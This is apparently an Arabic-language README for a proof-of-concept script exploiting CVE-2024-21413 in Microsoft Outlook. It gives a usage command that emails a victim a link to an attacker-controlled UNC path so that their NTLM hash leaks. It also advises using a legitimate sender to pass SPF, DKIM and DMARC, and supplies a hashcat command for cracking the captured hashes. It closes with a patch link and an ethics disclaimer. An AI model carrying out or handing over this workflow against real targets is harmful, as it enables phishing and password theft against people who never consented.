
ثغرة كشف المعلومات في Microsoft Outlook (تسريب تجزئة كلمة المرور) - سكربت Expect لإثبات المفهوم
ثغرة تسريب بيانات الاعتماد وتنفيذ التعليمات البرمجية عن بُعد في Microsoft Outlook عند دمجها مع CVE-2023-21716 (عبر لوحة المعاينة) CVSS:3.1 9.8 / 8.5
يجب أن يحذرك Outlook من المخاطرة عند فتح رابط خارجي => لكن هذا ليس هو الحال!

الاستخدام: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
ملاحظات: chmod +x cve-2024-21413.sh
يتطلب تطبيق Expect ويتطلب عنوان IP مرسل شرعيًا وبريدًا إلكترونيًا مرسلًا شرعيًا (لاجتياز SPF وDKIM وDMARC)



بعد ذلك ينبغي أن تسترجع بيانات الدخول والهاش الخاص بالشخص الذي نقر على الرابط (بدون رسالة التحذير في إصدارات Outlook المتأثرة)

يمكنك بعد ذلك محاولة كسر كلمة المرور باستخدام hashcat. فقط انسخ كل الأسطر التي تحتوي على اسم الدخول إلى ملف وشغّل hashcat مع الوحدة 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
حل بديل/إصلاح: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
المزيد عني ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ إخلاء مسؤولية: مهم: هذا السكربت مقدم للأغراض التعليمية والاختبار الأخلاقي والاستخدام القانوني فقط. لا تستخدمه على أي نظام أو شبكة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر والشبكات غير قانوني، والمستخدمون الذين يُضبطون وهم يقومون بأنشطة غير مصرح بها يخضعون لإجراءات قانونية. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا السكربت.